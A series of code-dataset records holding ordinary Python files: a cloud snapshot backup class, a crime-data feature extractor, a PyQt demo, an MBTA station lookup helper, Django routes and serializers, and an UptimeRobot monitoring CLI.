volume=None,\n **kwds):\n super(SnapBackup, self).__init__(\n volume=volume,\n **kwds)\n self.define_events(\n # Fires when all disk I/O activity should be freezed\n 'freeze',\n # Fires when all disk I/O activity should be resumed\n 'unfreeze'\n )\n\n def _run(self):\n self.volume = storage2.volume(self.volume)\n LOG.debug('Volume obj: %s', self.volume)\n LOG.debug('Volume config: %s', dict(self.volume))\n state = {}\n self.fire('freeze', self.volume, state)\n try:\n snap = self.volume.snapshot(self.description, tags=self.tags)\n finally:\n self.fire('unfreeze', self.volume, state)\n try:\n util.wait_until(lambda: snap.status() in (snap.COMPLETED, snap.FAILED),\n start_text='Polling snapshot status (%s)' % snap.id,\n logger=LOG)\n except:\n if 'Request limit exceeded' in str(sys.exc_info()[1]):\n pass\n else:\n raise\n if snap.status() == snap.FAILED:\n msg = 'Backup failed because snapshot %s failed' % snap.id\n raise Error(msg)\n return restore(\n type=self.type,\n snapshot=snap,\n **state)\n\n\nclass SnapRestore(Restore):\n\n def __init__(self, snapshot=None, volume=None, **kwds):\n super(SnapRestore, self).__init__(\n snapshot=snapshot,\n volume=volume,\n **kwds)\n\n\n def _run(self):\n self.snapshot = storage2.snapshot(self.snapshot)\n if self.volume:\n self.volume = storage2.volume(self.volume)\n self.volume.snap = self.snapshot\n self.volume.ensure()\n else:\n self.volume = self.snapshot.restore()\n return self.volume\n\n\nbackup_types['snap'] = SnapBackup\nrestore_types['snap'] = SnapRestore\n", "sub_path": "src/scalarizr/services/backup.py", "file_name": "backup.py", "file_ext": "py", "file_size_in_byte": 4450, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "12", "api": [{"api_name": "logging.getLogger", "line_number": 9, "usage_type": "call"}, {"api_name": "scalarizr.libs.bases.Task", "line_number": 54, "usage_type": "attribute"}, {"api_name": "scalarizr.libs.bases", "line_number": 54, "usage_type": "name"}, {"api_name": "scalarizr.libs.bases.Task", "line_number": 71, "usage_type": "attribute"}, {"api_name": "scalarizr.libs.bases", "line_number": 71, "usage_type": "name"}, {"api_name": "scalarizr.storage2.volume", "line_number": 112, "usage_type": "call"}, {"api_name": "scalarizr.storage2", "line_number": 112, "usage_type": "name"}, {"api_name": "scalarizr.util.wait_until", "line_number": 122, "usage_type": "call"}, {"api_name": "scalarizr.util", "line_number": 122, "usage_type": "name"}, {"api_name": "sys.exc_info", "line_number": 126, "usage_type": "call"}, {"api_name": "scalarizr.storage2.snapshot", "line_number": 149, "usage_type": "call"}, {"api_name": "scalarizr.storage2", "line_number": 149, "usage_type": "name"}, {"api_name": "scalarizr.storage2.volume", "line_number": 151, "usage_type": "call"}, {"api_name": "scalarizr.storage2", "line_number": 151, "usage_type": "name"}]} {"seq_id": "295171598", "text": "import re\nimport sklearn as skl\nimport sklearn.preprocessing\n\ndef vectorize(data, label_column, features=[('time', 0), ('day', 0), ('month', 0), ('year', 0), ('day_of_week', 0), ('latitude', 7), ('longitude', 8)]):\n\t'''Generator function that extracts and returns a selectible set of features for each data point in the data parameter.\n\t\n\tReturns a vector containing values for the selected features. The order in the features parameter is indicative of the order in\n\tthe resulting vector (except when using the 'streets' feature, see below).\n\t\n\tdata\n\tdata is a sequence of subscriptables. Each subscriptable usually represents a line read from a .csv file.\n\t\n\tlabel_column\n\tlabel_column is None if the data is unlabeled. Otherwise, it is the index under which the label is found in each subscriptable.\n\tThe label is assumed to be a string and will be mapped to an integer unique to each unique string. This integer is appended as the\n\tlast element in the output vector.\n\tThere is one more thing about this parameter. If it is not none, the first element yielded by this generator function is a dictionary\n\tthat maps crime type strings to unambiguous ids. It is empty until more elements are extracted from this generator.\n\t\n\tfeatures\n\tfeatures is an iterable of 2-tuples (feature, index). It indicates\n\t- which features to extract (first part of each tuple)\n\t- under which index information needed for that feature is found (second part of each tuple)\n\t- in which order to place the features in the resulting feature vector (given by the order in the iterable)\n\t\n\tAvailable features are: 'time', 'day', 'month', 'year', 'day_of_week', 'latitude', 'longitude', 'streets'.\n\tThe features 'time', 'day', 'month', 'year' and 'day_of_week' are extracted from a time.struct_time object, so their associated\n\tindex in the (feature, index) tuple is usually identical. 'latitude' and 'longitude' are expected to be floats and are used 'as is'.\n\t\n\tThe 'streets' feature is a bit special in that it doesn't produce a single value in the output vector, but three. There are two types\n\tof street designation formats in the data set:\n\t- STREET_1 / STREET_2\n\t- Xth block of STREET\n\tIn the former case, two unique ids for the streets are appended to the output vector, followed by a -1. In the latter case, the street\n\tid and then the block number is appended to the vector, followed by a +1.\n\t'''\n\t\n\tstreet_type_1 = re.compile(r'(.+) / (.+)') # Regular expression to recognize street designations of the form 'STREET_1 / STREET_2'\n\tstreet_type_2 = re.compile(r'(.+) Block of (.+)') # as above, for ' Xth block of STREET'\n\tcrime_type_ids = {} # Dictionary unambiguously mapping crime type strings to integer ids\n\tcrime_type_counter = 0 # Counts how many different types of crime have been found.\n\tstreet_ids = {} # Dictionary unambiguously mapping street name strings to integer ids\n\tstreet_counter = 0 # Counts how many unique street names have been found.\n\t\n\t# Provide caller with the dictionary if appropriate.\n\tif label_column is not None:\n\t\tyield crime_type_ids\n\n\tfor data_point in data:\n\t\t# Get crime id from dictionary, or make new one if neccessary.\n\t\tif label_column is not None:\n\t\t\ttry:\n\t\t\t\tcrime_type_id = crime_type_ids[data_point[label_column]]\n\t\t\texcept KeyError:\n\t\t\t\tcrime_type_ids[data_point[label_column]] = crime_type_counter\n\t\t\t\tcrime_type_counter += 1\n\t\t\t\tcrime_type_id = crime_type_ids[data_point[label_column]]\n\t\t\n\t\t# Create vector and append all requested features\n\t\tvec = []\n\t\tfor feature, column in features:\n\t\t\tif feature == 'time':\n\t\t\t\ttime = data_point[column].tm_hour * 60 + data_point[column].tm_min # Time in minutes since 00:00\n\t\t\t\tvec.append(time)\n\t\t\telif feature == 'day':\n\t\t\t\tday = data_point[column].tm_mday\n\t\t\t\tvec.append(day)\n\t\t\telif feature == 'month':\n\t\t\t\tmonth = data_point[column].tm_mon\n\t\t\t\tvec.append(month)\n\t\t\telif feature == 'year':\n\t\t\t\tyear = data_point[column].tm_year\n\t\t\t\tvec.append(year)\n\t\t\telif feature == 'day_of_week':\n\t\t\t\tvec.append(data_point[column].tm_wday)\n\t\t\telif feature == 'latitude':\n\t\t\t\tvec.append(data_point[column])\n\t\t\telif feature == 'longitude':\n\t\t\t\tvec.append(data_point[column])\n\t\t\telif feature == 'streets':\n\t\t\t\ttype1_match = street_type_1.match(data_point[column])\n\t\t\t\tif type1_match is not None: # Street designation is of the form 'STREET_1 / STREET_2'\n\t\t\t\t\tstreet1, street2 = type1_match.group(1, 2) # fetch components\n\t\t\t\t\tif street1 not in street_ids: # Get / create street id\n\t\t\t\t\t\tstreet_ids[street1] = street_counter\n\t\t\t\t\t\tstreet_counter += 1\n\t\t\t\t\tif street2 not in street_ids: # Get / create street id\n\t\t\t\t\t\tstreet_ids[street2] = street_counter\n\t\t\t\t\t\tstreet_counter += 1\n\t\t\t\t\ts1_id = street_ids[street1]\n\t\t\t\t\ts2_id = street_ids[street2]\n\t\t\t\t\tvec.append(s1_id)\n\t\t\t\t\tvec.append(s2_id)\n\t\t\t\t\tvec.append(-1)\n\t\t\t\telse: # Street designation is of the form 'Xth block of STREET'\n\t\t\t\t\ttype2_match = street_type_2.match(data_point[column])\n\t\t\t\t\tif type2_match is not None:\n\t\t\t\t\t\tblock, street = type2_match.group(1, 2) # fetch components\n\t\t\t\t\t\tblock = int(block)\n\t\t\t\t\t\tif street not in street_ids: # Get / create street id\n\t\t\t\t\t\t\tstreet_ids[street] = street_counter\n\t\t\t\t\t\t\tstreet_counter += 1\n\t\t\t\t\t\ts_id = street_ids[street]\n\t\t\t\t\t\tvec.append(s_id)\n\t\t\t\t\t\tvec.append(block)\n\t\t\t\t\t\tvec.append(1)\n\t\t\t\t\telse: # Street designation is in neither format\n\t\t\t\t\t\traise 'Unknown street format: {0}'.format(data_point[6])\n\t\t\telse: # Caller has requested an unknown feature\n\t\t\t\traise 'Feature not supported!'\n\t\t\n\t\t# If data is labeld, append vectorized data as last element\n\t\tif label_column is not None:\n\t\t\tvec.append(crime_type_id)\n\t\t\n\t\tyield vec\n\ndef remove_outliers(data, lat_index, long_index):\n\t'''Generator function that yields every item in the sequence data, if it is within the specified coordinates.'''\n\t# define outermost coordinates\n\tSOUTH = {'y': 37.696850, 'x': -122.440464}\n\tEAST = {'y': 37.764893, 'x': -122.347306} \n\tNORTH = {'y': 37.839763, 'x': -122.424554}\n\tWEST = {'y': 37.728356, 'x': -122.535908}\n\t\n\tfor data_point in data:\n\t\tif data_point[lat_index] < WEST['x'] \\\n\t\tor data_point[lat_index] > EAST['x'] \\\n\t\tor data_point[long_index] < SOUTH['y'] \\\n\t\tor data_point[long_index] > NORTH['y']:\n\t\t\tcontinue # data point is out of bounds, skip it\n\t\t\n\t\tyield data_point\n\ndef ensure_unit_variance(data, columns_to_normalize):\n\t'''Returns a version of data where all indicated columns are made to be mean-free and have unit variance.\n\t\n\tdata is a numpy array of shape (#samples, #features)\n\tcolumns_to_normalize is an iterable of column indices\n\t'''\n\tscaled_data = skl.preprocessing.scale(data)\n\t\n\tnew_data = data.copy()\n\tfor column in columns_to_normalize:\n\t\tnew_data[:,column] = scaled_data[:,column]\n\treturn new_data\n\n\n\n\n\n\n\n\n\n\n\n", "sub_path": "project/src/data_processing.py", "file_name": "data_processing.py", "file_ext": "py", "file_size_in_byte": 6686, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "12", "api": [{"api_name": "re.compile", "line_number": 39, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 40, "usage_type": "call"}, {"api_name": "sklearn.preprocessing.scale", "line_number": 142, "usage_type": "call"}, {"api_name": "sklearn.preprocessing", "line_number": 142, "usage_type": "attribute"}]} {"seq_id": "252949470", "text": "#!/usr/bin/python3\n# -*- coding:utf-8 -*-\nimport sys\nfrom PyQt5.QtCore import Qt\nfrom PyQt5.QtWidgets import QApplication, QLabel, QWidget\n\n\nclass Example(QWidget):\n def __init__(self):\n super().__init__()\n self.initUI();\n\n def initUI(self):\n label1 = QLabel(\"Label 1 \", self)\n label1.move(10, 10)\n\n label2 = QLabel(\"Label 1 \", self)\n label2.move(20, 20)\n\n label3 = QLabel(\"Label 1 \", self)\n label3.move(30, 30)\n\n self.setGeometry(100, 100, 500, 500)\n self.setWindowTitle('absolute ')\n self.show()\n\n # def keyPressEvent(self, e):\n # if e.key() == Qt.Key_Escape:\n # self.close()\n\n def keyPressEvent(self, e):\n if e.key() == Qt.Key_Escape:\n self.close()\n\n\nif __name__ == '__main__':\n app = QApplication(sys.argv)\n ex = Example()\n sys.exit(app.exec_())\n", "sub_path": "com/slkk/pyqt/escape.py", "file_name": "escape.py", "file_ext": "py", "file_size_in_byte": 884, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "12", "api": [{"api_name": "PyQt5.QtWidgets.QWidget", "line_number": 8, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QLabel", "line_number": 14, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QLabel", "line_number": 17, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QLabel", "line_number": 20, "usage_type": "call"}, {"api_name": "PyQt5.QtCore.Qt.Key_Escape", "line_number": 32, "usage_type": "attribute"}, {"api_name": "PyQt5.QtCore.Qt", "line_number": 32, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QApplication", "line_number": 37, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 37, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 39, "usage_type": "call"}]} {"seq_id": "533837239", "text": "import numpy as np\nfrom multiprocessing import Queue, Value, Process\n\nfrom server.analysis.compressor._run import _run\n\n\nclass Compressor:\n def __init__(self):\n self._is_running = Value(\"i\", False)\n self._input_image_queue = Queue()\n self._output_image_queue = Queue()\n self._process = None\n\n def start(self):\n self._process = Process(\n target=_run,\n args=(self._input_image_queue, self._output_image_queue, self._is_running)\n )\n self._is_running.value = True\n self._process.start()\n\n def stop(self):\n if self._process is None:\n raise AttributeError(\"Compressor did not start yet, cannot stop\")\n\n self._is_running.value = False\n self._input_image_queue.put(np.empty((1, 1, 3), dtype=np.uint8))\n self._process.join()\n\n @property\n def input_queue(self) -> Queue:\n return self._input_image_queue\n\n @property\n def output_queue(self) -> Queue:\n return self._output_image_queue\n", "sub_path": "server/analysis/compressor/__init__.py", "file_name": "__init__.py", "file_ext": "py", "file_size_in_byte": 1024, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "12", "api": [{"api_name": "multiprocessing.Value", "line_number": 9, "usage_type": "call"}, {"api_name": "multiprocessing.Queue", "line_number": 10, "usage_type": "call"}, {"api_name": "multiprocessing.Queue", "line_number": 11, "usage_type": "call"}, {"api_name": "multiprocessing.Process", "line_number": 15, "usage_type": "call"}, {"api_name": "server.analysis.compressor._run._run", "line_number": 16, "usage_type": "name"}, {"api_name": "numpy.empty", "line_number": 27, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 27, "usage_type": "attribute"}, {"api_name": "multiprocessing.Queue", "line_number": 31, "usage_type": "name"}, {"api_name": "multiprocessing.Queue", "line_number": 35, "usage_type": "name"}]} {"seq_id": "424640969", "text": "import urllib.request\nimport json\n# from googlemaps import GoogleMaps\nfrom pprint import pprint\n\n\n\n# Useful URLs (you need to add the appropriate parameters for your requests)\nGMAPS_BASE_URL = \"http://maps.googleapis.com/maps/api/geocode/json?\"\nMBTA_BASE_URL = \"http://realtime.mbta.com/developer/api/v2/stopsbylocation\"\nMBTA_DEMO_API_KEY = \"wX9NwuHnZU2ToO7GmGR9uw\"\n\n\n# A little bit of scaffolding if you want to use it\n\ndef get_json(url):\n \"\"\"\n Given a properly formatted URL for a JSON web API request, return\n a Python JSON object containing the response to that request.\n \"\"\"\n\n f = urllib.request.urlopen(url)\n response_text = f.read().decode('utf-8')\n response_data = json.loads(response_text)\n return response_data\n\n\n\n\ndef get_lat_long(place_name):\n \"\"\"\n Given a place name or address, return a (latitude, longitude) tuple\n with the coordinates of the given place.\n See https://developers.google.com/maps/documentation/geocoding/\n for Google Maps Geocode API URL formatting requirements.\n \"\"\"\n new_place = str()\n for letter in place_name:\n if letter is not ' ':\n new_place = new_place + letter\n else:\n new_place += '%20'\n\n\n url = GMAPS_BASE_URL +'address=' + new_place\n\n\n json_data = get_json(url)\n\n return json_data['results'][0]['geometry']['location']['lat'], json_data['results'][0]['geometry']['location']['lng']\n\n\n\ndef get_nearest_station(latitude, longitude):\n \"\"\"\n Given latitude and longitude strings, return a (station_name, distance)\n tuple for the nearest MBTA station to the given coordinates.\n See http://realtime.mbta.com/Portal/Home/Documents for URL\n formatting requirements for the 'stopsbylocation' API.\n \"\"\"\n\n\n\n MBTA_BASE_URL = \"http://realtime.mbta.com/developer/api/v2/stopsbylocation\"\n MBTA_DEMO_API_KEY = \"wX9NwuHnZU2ToO7GmGR9uw\"\n\n url_m = MBTA_BASE_URL +'?api_key=' + MBTA_DEMO_API_KEY + \"&lat=\" + str(latitude) + \"&lon=\" + str(longitude) + '&format=json'\n station_json = get_json(url_m)\n station_name = station_json['stop'][0]['stop_name']\n distance = station_json['stop'][0]['distance']\n distance = '{:.2f}'.format(float(distance))\n return (station_name, distance)\n\n\n\n\ndef find_stop_near(place_name):\n \"\"\"\n Given a place name or address, return the nearest MBTA stop and the \n distance from the given place to that stop.\n \"\"\"\n\n lat, lng = get_lat_long(place_name)\n return get_nearest_station(lat, lng)\n\n\n\nprint(find_stop_near('fenway park'))\n\n# find_stop_near('fenway')\n", "sub_path": "src/mbta_helper.py", "file_name": "mbta_helper.py", "file_ext": "py", "file_size_in_byte": 2561, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "12", "api": [{"api_name": "urllib.request.request.urlopen", "line_number": 22, "usage_type": "call"}, {"api_name": "urllib.request.request", "line_number": 22, "usage_type": "attribute"}, {"api_name": "urllib.request", "line_number": 22, "usage_type": "name"}, {"api_name": "json.loads", "line_number": 24, "usage_type": "call"}]} {"seq_id": "243267383", "text": "\"\"\"project URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/2.0/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.urls import include, path\n 2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\nfrom django.contrib import admin\nfrom django.urls import path\nimport app01.views\n\nurlpatterns = [\n path('admin/', admin.site.urls),\n path('',app01.views.index, name='index'),\n path('word',app01.views.word, name='word'),\n path('blog',app01.views.blog, name='blog'),\n path('new',app01.views.new, name='new'),\n path('create', app01.views.create, name='create'),\n path('detail/', app01.views.detail, name='detail'),\n path('delete/', app01.views.delete, name='delete'),\n path('update/', app01.views.update, name=\"update\"),\n path('ud/', app01.views.ud, name=\"ud\")\n]\n", "sub_path": "Django/project/project/urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 1273, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "0", "api": [{"api_name": "django.urls.path", "line_number": 21, "usage_type": "call"}, {"api_name": "django.contrib.admin.site", "line_number": 21, "usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 21, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 22, "usage_type": "call"}, {"api_name": "app01.views.views", "line_number": 22, "usage_type": "attribute"}, {"api_name": "app01.views", "line_number": 22, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 23, "usage_type": "call"}, {"api_name": "app01.views.views", "line_number": 23, "usage_type": "attribute"}, {"api_name": "app01.views", "line_number": 23, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 24, "usage_type": "call"}, {"api_name": "app01.views.views", "line_number": 24, "usage_type": "attribute"}, {"api_name": "app01.views", "line_number": 24, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 25, "usage_type": "call"}, {"api_name": "app01.views.views", "line_number": 25, "usage_type": "attribute"}, {"api_name": "app01.views", "line_number": 25, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 26, "usage_type": "call"}, {"api_name": "app01.views.views", "line_number": 26, "usage_type": "attribute"}, {"api_name": "app01.views", "line_number": 26, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 27, "usage_type": "call"}, {"api_name": "app01.views.views", "line_number": 27, "usage_type": "attribute"}, {"api_name": "app01.views", "line_number": 27, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 28, "usage_type": "call"}, {"api_name": "app01.views.views", "line_number": 28, "usage_type": "attribute"}, {"api_name": "app01.views", "line_number": 28, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 29, "usage_type": "call"}, {"api_name": "app01.views.views", "line_number": 29, "usage_type": "attribute"}, {"api_name": "app01.views", "line_number": 29, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 30, "usage_type": "call"}, {"api_name": "app01.views.views", "line_number": 30, "usage_type": "attribute"}, {"api_name": "app01.views", "line_number": 30, "usage_type": "name"}]} {"seq_id": "4284597", "text": "from django.core.management.base import BaseCommand, CommandError\n\nfrom app import models\n\n_twitteruser_username = \"10sr\"\n_twitteruser_id_str = \"73722749\"\n\n\nclass Command(BaseCommand):\n help = \"Count sleep record num\"\n\n def add_arguments(self, parser):\n return\n\n def handle(self, *args, **kargs):\n try:\n user = models.TwitterUser.objects.get(username=_twitteruser_username)\n self.stdout.write(\"TwitterUser `{}' already exists\".format(user))\n except models.TwitterUser.DoesNotExist as e:\n self.stdout.write(\n \"TwitterUser {} not exists, creating\".format(_twitteruser_username)\n )\n models.TwitterUser(\n username=_twitteruser_username, id_str=_twitteruser_id_str\n ).save()\n # return\n", "sub_path": "app/management/commands/local_addrecords.py", "file_name": "local_addrecords.py", "file_ext": "py", "file_size_in_byte": 813, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "0", "api": [{"api_name": "django.core.management.base.BaseCommand", "line_number": 9, "usage_type": "name"}, {"api_name": "app.models.TwitterUser.objects.get", "line_number": 17, "usage_type": "call"}, {"api_name": "app.models.TwitterUser", "line_number": 17, "usage_type": "attribute"}, {"api_name": "app.models", "line_number": 17, "usage_type": "name"}, {"api_name": "app.models.TwitterUser", "line_number": 19, "usage_type": "attribute"}, {"api_name": "app.models", "line_number": 19, "usage_type": "name"}, {"api_name": "app.models.TwitterUser", "line_number": 23, "usage_type": "call"}, {"api_name": "app.models", "line_number": 23, "usage_type": "name"}]} {"seq_id": "228990429", "text": "#!/usr/bin/env python3\n\nimport http.client\nimport json\nimport sys\nimport os\n\n\nAPI_KEY = os.environ.get('UPTIME_ROBOT_API_KEY')\nif API_KEY == None:\n\tprint(\"API Key not found. Be sure to set UPTIME_ROBOT_API_KEY environment variable.\")\n\tsys.exit()\n\n\nALERT_CONTACT_ID = os.environ.get('UPTIME_ROBOT_ALERT_CONTACTS')\nif API_KEY == None:\n\tprint(\"Alert contacts not set. Be sure to set ALERT_CONTACT_ID environment variable.\")\n\tsys.exit()\n\n\nINTERVAL = 60\nLIMIT = 50\nMONITORS = {'monitors': []}\n\n\nclass bcolors:\n HEADER = '\\033[95m'\n OKBLUE = '\\033[94m'\n OKGREEN = '\\033[92m'\n WARNING = '\\033[93m'\n FAIL = '\\033[91m'\n ENDC = '\\033[0m'\n BOLD = '\\033[1m'\n UNDERLINE = '\\033[4m'\n\ndef uptimeRequest(location,payload):\n\n\tdefault_payload = \"api_key=\"+ API_KEY\n\tdefault_payload += \"&format=json\"\n\n\tdefault_payload += payload\n\theaders = {\n \t\t'content-type': \"application/x-www-form-urlencoded\",\n \t\t'cache-control': \"no-cache\"\n\t}\n\tconn = http.client.HTTPSConnection(\"api.uptimerobot.com\")\n\tconn.request(\"POST\", location, default_payload, headers) \n\tres = conn.getresponse()\n\tdata = res.read()\n\treturn(json.loads(data))\n\ndef getMonitors(page = 1, offset = 0):\n\n\tpayload = \"&alert_contacts=1\"\n\tpayload += \"&offset=\"+str(offset)\n\tpayload += \"&limit=\"+str(LIMIT)\n \n\tdata = uptimeRequest(\"/v2/getMonitors\",payload)\n\t\n\tfor monitor in data['monitors']:\n\t\ti = len(MONITORS) + 1\n\t\tMONITORS['monitors'].append(monitor)\n\n\t#calculate pagination\n\tpage = int(page) + 1\n\toffset = (LIMIT * page) - LIMIT\n\tif offset < data['pagination']['total']:\n\t\tgetMonitors(page, offset)\n\ndef listMonitors():\n\tgetMonitors()\n\tfor monitor in MONITORS['monitors']:\n\n\t\tif monitor['status'] == 0:\n\t\t\tstatus = bcolors.OKGREEN + \"paused\" + bcolors.ENDC\n\t\telif monitor['status'] == 1:\n\t\t\tstatus = bcolors.OKGREEN + \"paused\" + bcolors.ENDC\n\t\telif monitor['status'] == 2:\n\t\t\tstatus = bcolors.OKGREEN + \"online\" + bcolors.ENDC\n\t\telse:\n\t\t\tstatus = bcolors.FAIL + \"offline\" + bcolors.ENDC\n\t\tprint(monitor['friendly_name'],status)\n\ndef listMonitorIdByName(name):\n\tgetMonitors()\n\tfor monitor in MONITORS['monitors']:\n\t\tif name == monitor['friendly_name']:\n\t\t\treturn(monitor['id'])\n\ndef deleteMonitorByName(name):\n\treturn deleteMonitorById(listMonitorIdByName(name))\n\ndef deleteMonitorById(id):\n\tpayload = \"&id=\"+str(id)\n\tprint(uptimeRequest(\"/v2/deleteMonitor\",payload))\n\n\ndef addMonitor(monitor_type, url):\n\n\t#types\n\t#1 - HTTP(s)\n\t#2 - Keyword\n\t#3 - Ping\n\t#4 - Port\n\t\n\t#sub types\n\t#1 - HTTP (80)\n\t#2 - HTTPS (443)\n\t#3 - FTP (21)\n\t#4 - SMTP (25)\n\t#5 - POP3 (110)\n\t#6 - IMAP (143)\n\t#99 - Custom Port\n\n\tif monitor_type == \"http\":\n\t\tMONITOR_TYPE = \"1\"\n\t\tSUB_TYPE = \"1\"\n\t\tPORT = \"\"\n\t\tURL = \"http://\"+url\n\telif monitor_type == \"https\":\n\t\tMONITOR_TYPE = \"1\"\n\t\tSUB_TYPE = \"2\"\n\t\tPORT = \"\"\n\t\tURL = \"https://\"+url\n\telif monitor_type == \"smtp\":\n\t\tMONITOR_TYPE = \"4\"\n\t\tSUB_TYPE = \"4\"\n\t\tPORT = \"\"\n\t\tURL = url\n\telif monitor_type == \"imap\":\n\t\tMONITOR_TYPE = \"4\"\n\t\tSUB_TYPE = \"6\"\n\t\tPORT = \"\"\n\t\tURL = url\n\telif monitor_type == \"ssh\":\n\t\tMONITOR_TYPE = \"4\"\n\t\tSUB_TYPE = \"99\"\n\t\tPORT = \"22\"\n\t\tURL = url\n\telif monitor_type == \"mysql\":\n\t\tMONITOR_TYPE = \"4\"\n\t\tSUB_TYPE = \"99\"\n\t\tPORT = \"3306\"\n\t\tURL = url\n\telif monitor_type == \"ping\":\n\t\tMONITOR_TYPE = \"3\"\n\t\tSUB_TYPE = \"\"\n\t\tPORT = \"\"\n\t\tURL = url\n\telse:\n\t\tprint(\"invalid monitor type\")\n\t\tsys.exit()\n\t\n\tFRIENDLY_NAME = url + \" \" + monitor_type\n\t\n\tpayload = \"&type=\"+MONITOR_TYPE\n\tif SUB_TYPE:\n\t\tpayload += \"&sub_type=\"+SUB_TYPE\n\tif PORT:\n\t\tpayload += \"&port=\"+PORT\n\tpayload += \"&url=\"+URL\n\tpayload += \"&friendly_name=\"+FRIENDLY_NAME\n\tpayload += \"&interval=\"+str(INTERVAL)\n\tpayload += \"&alert_contacts=\"+ALERT_CONTACT_ID\n\n\tprint(uptimeRequest(\"/v2/newMonitor\",payload))\n\ndef getAlertContacts():\n\tpayload = \"\"\n\n\tjson_results = uptimeRequest(\"/v2/getAlertContacts\",payload)\n\tfor alert_contact in json_results['alert_contacts']:\n\t\tprint(alert_contact['id'],alert_contact['friendly_name'])\n\nargs = sys.argv[1:]\n\nif len(args) == 0:\n\tlistMonitors()\n\nelif args[0] == \"monitors\":\n\tlistMonitors()\n\nelif args[0] == \"monitorid\":\n\tprint(listMonitorIdByName(args[1]))\n\nelif args[0] == \"contacts\":\n\tgetAlertContacts()\n\nelif args[0] == \"create\":\n\tif len(args) == 3:\n\t\taddMonitor(args[1], args[2])\n\telse:\n\t\tprint(\"invalid usage. \\n uptimerobot.py create \")\n\nelif args[0] == \"delete\":\n\tif len(args) == 2:\n\t\tdeleteMonitorById(args[1])\n\telse:\n\t\tprint(\"invalid usage. \\n uptimerobot.py delete \")\nelse:\n\tprint(\"invalid command. \\n\")\n\tprint(\"uptimerobot-cli monitors\")\n\tprint(\"uptimerobot-cli monitorid \")\n\tprint(\"uptimerobot-cli contacts\")\n\tprint(\"uptimerobot-cli create \")\n\tprint(\"uptimerobot-cli delete \")", "sub_path": "uptimerobot.py", "file_name": "uptimerobot.py", "file_ext": "py", "file_size_in_byte": 4624, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "12", "api": [{"api_name": "os.environ.get", "line_number": 9, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 9, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 12, "usage_type": "call"}, {"api_name": "os.environ.get", "line_number": 15, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 15, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 18, "usage_type": "call"}, {"api_name": "http.client.client.HTTPSConnection", "line_number": 46, "usage_type": "call"}, {"api_name": "http.client.client", "line_number": 46, "usage_type": "attribute"}, {"api_name": "http.client", "line_number": 46, "usage_type": "name"}, {"api_name": "json.loads", "line_number": 50, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 152, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 175, "usage_type": "attribute"}]} {"seq_id": "606065995", "text": "###############################################################################################################################\n# 3 模型序列化器\n# 1. 可以帮我们自动完成字段的声明[主要是从模型中的字段声明里面提取过来]\n# 2. 模型序列化器也可以帮我们声明了create和update方法的代码\n###############################################################################################################################\nfrom rest_framework import serializers\nfrom booktest.models import BookInfo\nclass BookInfoModelSerializer(serializers.ModelSerializer):\n # 模型序列化器也可以自定义验证字段[当某些数据不存在于数据库时,但是需要前端提交过来的,可以进行自定义,\n # 例如,验证码,确认密码]\n\n class Meta:\n model=BookInfo\n fields = \"__all__\"\n # 可以给模型序列化器里面指定的字段设置限制选项\n extra_kwargs = {\n \"bread\":{\"min_value\":0,\"required\":True},\n }\n\n # 自定义验证方法[验证单个字段,可以有多个方法]\n # def validate_<字段名>(self,data): # data当前字段对应的值\n def validate_btitle(self,data):\n print(\"----获取视图类中传递过来的数据---\")\n print(self.context.get(\"view\"))\n # 可以通过视图类附带一些数据到序列化器里面直接使用 view.py的69行代码\n # print(self.context.get(\"view\").user)\n print(\"----获取视图类中传递过来的数据---\")\n # 例如,图书名不能是红楼梦\n if data==\"红楼梦\":\n # 抛出错误\n raise serializers.ValidationError(\"红楼梦是禁书~\")\n # 验证方法中,把数据值必须返回给字段,否则字段值为空\n return data\n\n # 自定义验证方法[验证多个或者所有字段,只能出现一次]\n def validate(self,data): # data 这个是所有字段的内容,字典类型\n bread = data.get(\"bread\")\n bcomment = data.get(\"bcomment\")\n if bread>=bcomment:\n return data\n raise serializers.ValidationError(\"阅读量小于评论量,数据太假了\")", "sub_path": "viewdemo/serializers.py", "file_name": "serializers.py", "file_ext": "py", "file_size_in_byte": 2166, "program_lang": "python", "lang": 